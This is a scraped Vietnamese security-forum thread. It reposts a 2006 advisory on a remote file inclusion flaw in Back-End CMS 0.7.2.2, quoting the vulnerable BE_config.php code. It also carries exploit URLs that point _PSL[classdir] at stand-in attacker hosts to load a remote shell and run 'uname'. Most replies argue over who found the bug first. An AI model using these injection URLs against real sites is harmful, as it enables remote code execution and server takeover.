http://www.example.com/BE_config.php?_PSL[classdir]=http://www.attachker/shell.php_? 

]]> /hvaonline/posts/list/503.html#1474 /hvaonline/posts/list/503.html#1474 GMT /hvaonline/posts/list/503.html#1779 /hvaonline/posts/list/503.html#1779 GMT http://www.devilteam.yum.pl # Site of script: http://www.back-end.org # #################################################################### */ BE_config.php Line 27-31: Code:

...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...

/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts] #Elo ;-) ExploitAlert Id : 633 Credit : Kacper http://securityreason.com/exploitalert/633 Date : 27.5.2006 Bạn Dũnglà chủ nhân hồi nào vậy?]]> /hvaonline/posts/list/503.html#1783 /hvaonline/posts/list/503.html#1783 GMT http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname ]]> /hvaonline/posts/list/503.html#1790 /hvaonline/posts/list/503.html#1790 GMT /hvaonline/posts/list/503.html#1832 /hvaonline/posts/list/503.html#1832 GMT /hvaonline/posts/list/503.html#1906 /hvaonline/posts/list/503.html#1906 GMT

H0angY3nXinhdep wrote:

Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability ExploitAlert Id : 633 Credit : Kacper Date : 27.5.2006 Download Exploit Code : ################# DEVIL TEAM THE BEST POLISH TEAM ################## # # Back-End CMS - Remote File Include Vulnerabilities # Find by Kacper (Rahim). # Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** # Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl # Site of script: http://www.back-end.org # #################################################################### */ BE_config.php Line 27-31: Code:

...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...

/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts] #Elo ;-) ExploitAlert Id : 633 Credit : Kacper http://securityreason.com/exploitalert/633 Date : 27.5.2006 Bạn Dũnglà chủ nhân hồi nào vậy? 

Ôi sorry! Thực lòng bug này cũng do mình hunt thực và post tai đây: http://forum.milw0rm.com/viewtopic.php?p=1531 Và củng public tại vniss.]]> /hvaonline/posts/list/503.html#1921 /hvaonline/posts/list/503.html#1921 GMT /hvaonline/posts/list/503.html#1925 /hvaonline/posts/list/503.html#1925 GMT /hvaonline/posts/list/503.html#1945 /hvaonline/posts/list/503.html#1945 GMT /hvaonline/posts/list/503.html#2024 /hvaonline/posts/list/503.html#2024 GMT /hvaonline/posts/list/503.html#2076 /hvaonline/posts/list/503.html#2076 GMT /hvaonline/posts/list/503.html#2081 /hvaonline/posts/list/503.html#2081 GMT /hvaonline/posts/list/503.html#2184 /hvaonline/posts/list/503.html#2184 GMT /hvaonline/posts/list/503.html#2260 /hvaonline/posts/list/503.html#2260 GMT

H0angY3nXinhdep wrote:

Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng 

OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)...]]> /hvaonline/posts/list/503.html#2433 /hvaonline/posts/list/503.html#2433 GMT /hvaonline/posts/list/503.html#3037 /hvaonline/posts/list/503.html#3037 GMT /hvaonline/posts/list/503.html#26003 /hvaonline/posts/list/503.html#26003 GMT

mrdung wrote:

H0angY3nXinhdep wrote:

Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng 

OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)... 

Tôi nhận thấy chính dungit hunt được bug đó... trang http://milw0rm.com cũng đủ uy tín. Về khả năng của dungit thì tôi thấy rất khá, qua những gì tôi thấy truớc đây ]]> /hvaonline/posts/list/503.html#26036 /hvaonline/posts/list/503.html#26036 GMT /hvaonline/posts/list/503.html#27907 /hvaonline/posts/list/503.html#27907 GMT